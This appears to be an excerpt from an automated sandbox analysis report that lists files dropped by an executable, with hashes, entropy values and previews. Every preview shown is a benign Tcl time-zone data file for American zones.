                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):399
                                                                                                                                                                                                                              Entropy (8bit):4.513185345162455
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862906GGmdHKznC972f/uF+mP/uF+K67Jqd3/uF+eBxE/uF+DAWNv:5neQCgfS+6S+K67Yd3S+e0S+1
                                                                                                                                                                                                                              MD5:569CDE7CE1AB84C0F16A25E85A418334
                                                                                                                                                                                                                              SHA1:EADE79AB6EDD98C7FE8B10B480C5C530CA014F5C
                                                                                                                                                                                                                              SHA-256:14F6A98D602F3648C816B110F3A0BA375E1FFE8FA06BEEAB419DC1ABFA6EDCAF
                                                                                                                                                                                                                              SHA-512:AE2ACBF09EED857906811BE2984D6BF92BF2955A9FE2F9F3FFEBB6790902F5C2C870F8561CA13AD9CB7826EECA434BED7CFE7D0D2739996BACEE506D0EB730DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guatemala) {.. {-9223372036854775808 -21724 0 LMT}.. {-1617040676 -21600 0 CST}.. {123055200 -18000 1 CDT}.. {130914000 -21600 0 CST}.. {422344800 -18000 1 CDT}.. {433054800 -21600 0 CST}.. {669708000 -18000 1 CDT}.. {684219600 -21600 0 CST}.. {1146376800 -18000 1 CDT}.. {1159678800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):249
                                                                                                                                                                                                                              Entropy (8bit):4.745656594295655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2905xDm2OHHjGeoHv5laITicKpKV0EX/uFhfF/KVg:MB86290jmdHHLCv5FT/gOR/uFpF/Og
                                                                                                                                                                                                                              MD5:DF661E312C6CE279CD6829120BE33CF2
                                                                                                                                                                                                                              SHA1:4ACDB31E27EF9175C5452BF95F94F9BC280A237F
                                                                                                                                                                                                                              SHA-256:6806AA5814BDC679C6EF653C518D2699114BE71D973F49C0864F622038DC2048
                                                                                                                                                                                                                              SHA-512:04E7FD01F4DAD981EE8A02487F4A889015C41D07D6DCF420183D387E2188FF3239E345B5D65FB195CA485F5C7B4AD8CFEF51FFFC11EE0C91F0C88FF7B7EF17C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guayaquil) {.. {-9223372036854775808 -19160 0 LMT}.. {-2524502440 -18840 0 QMT}.. {-1230749160 -18000 0 -05}.. {722926800 -14400 1 -05}.. {728884800 -18000 0 -05}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):248
                                                                                                                                                                                                                              Entropy (8bit):4.673559445766137
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2905R3SDm2OHRLx5oH8ZOXFxSyZ1yV/KMMdVVFAKFZ4KVR/ON:MB86290LGmdHBnC8ZODhyV/4d/OeZ4Ke
                                                                                                                                                                                                                              MD5:F06C226D8D53EF8859AD91D7EBA5959C
                                                                                                                                                                                                                              SHA1:E0B4E6F4ADCB10F1D79FFD928E8684FFE0C0DC5F
                                                                                                                                                                                                                              SHA-256:4078D2E361D04A66F22F652E3810CDF7F630CF89399B47E4EC7B1D32B400FD85
                                                                                                                                                                                                                              SHA-512:B4385650A0C69B7BD66415CC4BB9FCA854DBB1427E9F2D6C1D8CDB8CCEF9ECBD699C66A83A9AC289DABC5CDBB0A2B044E4097E9A2977AE1802B3BF6E2BB518CF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guyana) {.. {-9223372036854775808 -13959 0 LMT}.. {-1843589241 -14400 0 -04}.. {-1730577600 -13500 0 -0345}.. {176096700 -10800 0 -03}.. {701841600 -14400 0 -04}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11124
                                                                                                                                                                                                                              Entropy (8bit):3.8106487461849885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:YpQamC9XD81iWQSufutTLBCN8RWnWQ7Z/xVpmtBwXiCDLxcGMe++wzlrfFj10Kvn:2kXCvNc/1/CC
                                                                                                                                                                                                                              MD5:6FB9E47841FF397CE36A36C8280E2089
                                                                                                                                                                                                                              SHA1:DA210300DC3D94FC3D8BA0A4531341BCA5C5936C
                                                                                                                                                                                                                              SHA-256:01E11C7B07925D05E9E1876C310A2B87E0E80EF115D062225212E472B7A964F1
                                                                                                                                                                                                                              SHA-512:F61B5A8A7532BBD54A4976DF17A1C6CF51BCC6DC396482FBE169C3081AF27B6CA863F0CDE3E483C59F5A5BD3365592F6984A97173C736B41D3CEEDAD4263A4E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Halifax) {.. {-9223372036854775808 -15264 0 LMT}.. {-2131645536 -14400 0 AST}.. {-1696276800 -10800 1 ADT}.. {-1680469200 -14400 0 AST}.. {-1640980800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1609444800 -14400 0 AST}.. {-1566763200 -10800 1 ADT}.. {-1557090000 -14400 0 AST}.. {-1535486400 -10800 1 ADT}.. {-1524949200 -14400 0 AST}.. {-1504468800 -10800 1 ADT}.. {-1493413200 -14400 0 AST}.. {-1472414400 -10800 1 ADT}.. {-1461963600 -14400 0 AST}.. {-1440964800 -10800 1 ADT}.. {-1429390800 -14400 0 AST}.. {-1409515200 -10800 1 ADT}.. {-1396731600 -14400 0 AST}.. {-1376856000 -10800 1 ADT}.. {-1366491600 -14400 0 AST}.. {-1346616000 -10800 1 ADT}.. {-1333832400 -14400 0 AST}.. {-1313956800 -10800 1 ADT}.. {-1303678800 -14400 0 AST}.. {-1282507200 -10800 1 ADT}.. {-1272661200 -14400 0 AST}.. {-1251057600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8729
                                                                                                                                                                                                                              Entropy (8bit):3.8227313494100867
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:BEsWduCtQA/gF6Y3Umjm67yLb5RCzhV28I:BBWACb/gF6Y3UmjBy7
                                                                                                                                                                                                                              MD5:564980AECB32F5778422EA15E8956879
                                                                                                                                                                                                                              SHA1:545209C95043721C1839CCE5FEFD1A6F2DE3FE5F
                                                                                                                                                                                                                              SHA-256:96B62BFBF0C05CF970245597C691F89EBF631175796459642A85287F131D0215
                                                                                                                                                                                                                              SHA-512:25FE5DAA55E3466EAE1CDC73918F189403C3360D4E82D72D745FA04A374DE04F479AA9811D6154FC70CC8EA620F18035EA6A3074116806D4405936FA017CE8E6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Havana) {.. {-9223372036854775808 -19768 0 LMT}.. {-2524501832 -19776 0 HMT}.. {-1402813824 -18000 0 CST}.. {-1311534000 -14400 1 CDT}.. {-1300996800 -18000 0 CST}.. {-933534000 -14400 1 CDT}.. {-925675200 -18000 0 CST}.. {-902084400 -14400 1 CDT}.. {-893620800 -18000 0 CST}.. {-870030000 -14400 1 CDT}.. {-862171200 -18000 0 CST}.. {-775681200 -14400 1 CDT}.. {-767822400 -18000 0 CST}.. {-744231600 -14400 1 CDT}.. {-736372800 -18000 0 CST}.. {-144702000 -14400 1 CDT}.. {-134251200 -18000 0 CST}.. {-113425200 -14400 1 CDT}.. {-102542400 -18000 0 CST}.. {-86295600 -14400 1 CDT}.. {-72907200 -18000 0 CST}.. {-54154800 -14400 1 CDT}.. {-41457600 -18000 0 CST}.. {-21495600 -14400 1 CDT}.. {-5774400 -18000 0 CST}.. {9954000 -14400 1 CDT}.. {25675200 -18000 0 CST}.. {41403600 -14400 1 CDT}.. {57729600 -18000 0 CST}.. {73458000 -14400 1 CD
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):616
                                                                                                                                                                                                                              Entropy (8bit):4.351214377567366
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290e2mdH5NCtXwl3UXmMMmxL+voudQCvX70qKOV9kYNv:5Ie5k9WUQwuz/Vyu
                                                                                                                                                                                                                              MD5:E35A6C6E9DCF0CA34BFA2993CE445D6C
                                                                                                                                                                                                                              SHA1:4FF9C7EDBC73B1AE0815661571B7199379AF479C
                                                                                                                                                                                                                              SHA-256:C0A87DC3A474D25083F0CEA0C323D8E780D937453CAD23C98AF367D81AC2CA2D
                                                                                                                                                                                                                              SHA-512:56A728ABCD3EA91D2492E1331B3F76F31EF5675BCD95A692F9D94F91518B72569FD8DF1BB0515668E8A9BE0347018B391C65761D316903CA27C59883BBE0DE80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Hermosillo) {.. {-9223372036854775808 -26632 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {915174000 -25200 0 MST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7230
                                                                                                                                                                                                                              Entropy (8bit):3.882344472808608
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:nys0KHK1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:nyBKHkN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:7824B3F2D20F16A9DCC8E0F7DC45C1B8
                                                                                                                                                                                                                              SHA1:77014A0502DA1342EFA41B64C5613839B627354B
                                                                                                                                                                                                                              SHA-256:4B114545167326F066AB3A798180896B43AC6FDC3B80D32BCC917B5A4A2359EB
                                                                                                                                                                                                                              SHA-512:03F6A18C03E79E9177D16CD7AB75AC117197638370FA675BC2854A5A563021F865F3F0672B237B83098787AB9D419AC33D67F28324B1E25AD8560B5838F70807
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Indianapolis) {.. {-9223372036854775808 -20678 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-900259200 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8755
                                                                                                                                                                                                                              Entropy (8bit):3.8394539560522585
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+q2KeNrdJ8SvAgahLi8hDlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:+FKUdJ8SvPaUqbA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:8AF080A022DA0737E94742C50EAAC62E
                                                                                                                                                                                                                              SHA1:704F0565B53AA8A20F70B79A7958D4D07085E07A
                                                                                                                                                                                                                              SHA-256:F1253F5F3F5AACD1A5E1F4636DD4E083F4B2A8BD995CF3E684CDD384641849F1
                                                                                                                                                                                                                              SHA-512:26AAF6D24B2E2B60451E19A514533DFAEC74F01F9B1AEB9F86690669C14130D77AE1CBFB9FC9091E1CD1FC1CBC2799BB05026DB68768C3CCB960355C18D111ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Knox) {.. {-9223372036854775808 -20790 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-725824800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-447267600 -21600 0 CST}.. {-431539200 -18000 1 CDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7273
                                                                                                                                                                                                                              Entropy (8bit):3.8700915866109535
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7qvrv7+X1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7Kv7+bN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:C1A10440E6CCE4C5052E2510182D9AA7
                                                                                                                                                                                                                              SHA1:56D4F3CCA1245D626BADA74CF3F6BAE8034BF58D
                                                                                                                                                                                                                              SHA-256:675162381639598E7100E90663D42780F8EE1CB62BD6DA5B948B494F98C02FE3
                                                                                                                                                                                                                              SHA-512:96B71472AD38ECFC589F935D9F5F1C8D42C8E942D8772FB6A77F9B9C0E2BD7A07FA61729E57EC02356121518E33797A784679F8DED2FCA3FC79F5C114783DD57
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Marengo) {.. {-9223372036854775808 -20723 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-599594400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7611
                                                                                                                                                                                                                              Entropy (8bit):3.87971256165061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:TqervJ8SUklggahyBRP0HY2iU7KKdFL6Aa2K4gSLf8e:TpvJ8SUklvaQN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:A86042668CD478AFFC05D3383EDEE8FF
                                                                                                                                                                                                                              SHA1:6476526F94A247C0ECF3B2813F2C5A4FB93E457E
                                                                                                                                                                                                                              SHA-256:23B8FA75CE0A9555DFD84549723A12679FF7FC5FAA58E4B745BA3C547071FF53
                                                                                                                                                                                                                              SHA-512:07A5487A087108E6D6E88580865885CA6243EF04BE8263FC913F38CADB8EA016386E8BBAD39F65FD081F1A2F14316FEAF008855E9CF2019B169D9511916AFF67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Petersburg) {.. {-9223372036854775808 -20947 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-473364000 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 1 CD
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7100
                                                                                                                                                                                                                              Entropy (8bit):3.8613085681914607
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:yqxrvJ8SUklLgzNA604qSScBgN+4ctDzIVQ/c/3hNxTh:yUvJ8SUkl8BA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:E7FE9B7CFBC6505C446056967DEBC87B
                                                                                                                                                                                                                              SHA1:81ADAD89F040F62E87D2F26D1D98B3E52710F695
                                                                                                                                                                                                                              SHA-256:D368123DB703B55244700876906775837D408C274C5A5801D80B77EADB6D5853
                                                                                                                                                                                                                              SHA-512:9C0746DE18C80B548AA443D59BB9971BDC304975717C5FCDEBDE72828ACF408FA1D687F87C42E7B8D6D0284C9F792EA236BF79C815947BE773D07364B630AC99
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Tell_City) {.. {-9223372036854775808 -20823 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 0 EST
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6563
                                                                                                                                                                                                                              Entropy (8bit):3.866646181493734
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:juqv01BRP0HY2iU7KKdFL6Aa2K4gSLf8e:CoKN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:2CCFC3980C321ED8A852759C0BCCB12C
                                                                                                                                                                                                                              SHA1:A8BFE02E4E71B28EF8E284E808F6EDE7C231F8FF
                                                                                                                                                                                                                              SHA-256:0623233AA39A1A82038A56DF255ADF49E648777375B8499491C8897EBEA1CDF1
                                                                                                                                                                                                                              SHA-512:A4C77689BC9BF871C756D05BAC4157F0FD324D10AC7D15F3543344C6F8C7FC9218AB7ADFBCE70C8ECCDD6EC15FD7960503FC7A8223FECE6D4227BF0BB04190C7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vevay) {.. {-9223372036854775808 -20416 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-495043200 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {94712400 -18000 0 EST}.. {1136091600 -18000 0 EST}.. {1143961200 -14400 1 EDT}.. {1162101600 -18000 0 EST}.. {1173596400 -14400 1 EDT}.. {1194156000 -18000 0 EST}.. {1205046000 -14400 1 EDT}.. {1225605600 -18000 0 EST}.. {1236495600 -14400 1 EDT}.. {1257055200 -18000 0 EST}.. {1268550000 -144
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7226
                                                                                                                                                                                                                              Entropy (8bit):3.879195938909716
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Vq8rdJ5UklpRBRP0HY2iU7KKdFL6Aa2K4gSLf8e:VbdJ5Uklp/N0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:56D1930F5FAE2456DEC6C9AB1B0233E1
                                                                                                                                                                                                                              SHA1:F6ED52EF769DF2C015C181BCFF3DC0E24497C768
                                                                                                                                                                                                                              SHA-256:B8452B6AA739A78AC6D03806463B03D4175639593E19FAA3CA4B0D0FB77F18C9
                                                                                                                                                                                                                              SHA-512:AFCFF383DB441DA9154B639A88700D0604F487A20E830146B14061E485A991AD8DC279AF8C0C2329265CF14C901207B9058157FAA1C039082EB7630916834156
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vincennes) {.. {-9223372036854775808 -21007 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-289414800 -21600 0 CST}.. {-273686400 -18000 1 CDT
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7410
                                                                                                                                                                                                                              Entropy (8bit):3.8775722319777968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:uq0KeKrv7c1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:unKxv7yN0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:880526DC23E7BDB00506D7EC2A885907
                                                                                                                                                                                                                              SHA1:DB3B13A2A4BF80E7B71C7F0604A0A80EF070B9BA
                                                                                                                                                                                                                              SHA-256:4B293FDB7680C4597B8C885333719214492ECF09BD5EA342D1EC15F2BF9C8605
                                                                                                                                                                                                                              SHA-512:42EEDC5EA28781D62A457F4843F38D0A3FEFCAD83BA01B07CEF0FA169C6440960E04BABD272C5E9AF2F4B0DBB2A786EF9221A48F084F16752E6D0EA66C31911E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Winamac) {.. {-9223372036854775808 -20785 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
